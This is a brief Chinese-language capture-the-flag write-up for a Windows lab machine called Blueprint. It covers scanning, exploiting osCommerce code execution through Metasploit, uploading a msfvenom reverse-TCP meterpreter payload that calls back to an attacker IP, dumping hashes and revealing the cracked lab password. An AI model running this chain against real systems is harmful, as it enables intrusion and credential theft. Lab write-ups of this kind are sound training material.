Blueprint
Hack into this Windows machine and escalate your privileges to Administrator.
任务1(获得lab用户NT hash)
任务2(获得root Flag
)
-
RustScan
-
Nmap
-
MSF
-
msfvenom
-
dumphash
0x01 信息收集
先用rustscan 扫描目标机器全端口(速度比较快),根据端口分析应该是个Windows,攻击面比较多。
先用Nmap的综合扫描扫一波,显示8080有个文件遍历
0x02 漏洞利用
既然开着445端口,就用msf探测一下,运行后提示不可利用。
然后访问8080端口,发现有个文件遍历,根据目录索引,来到oscommerce路径下
根据searchsploit搜索得到许多的漏洞payload
顺便到msf上搜索对应的漏洞exp,这里有个代码执行。
设置好options就run,成功弹回meterpreter的Shell。但是这个Shell不太“健全”。猜测肯能时受制于PHP的原因。
利用msfvenom生成一个windows的shell。用刚刚不太健全的meterpreter上传到目标机上。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.92.88 LPORT=7878 -f exe > shell.exe
上传 upload [本地文件] [目标目录]
upload /root/shell.exe c:\\
再访问shell.exe成功弹回meterpreter的shell,权限为system
完成任务一直接hashdump查看Lab用户的NT hash。使用在线网站解密敏文为:googleplus
0x03 root Flag
查看root 的flag ,一般在管理员的桌面。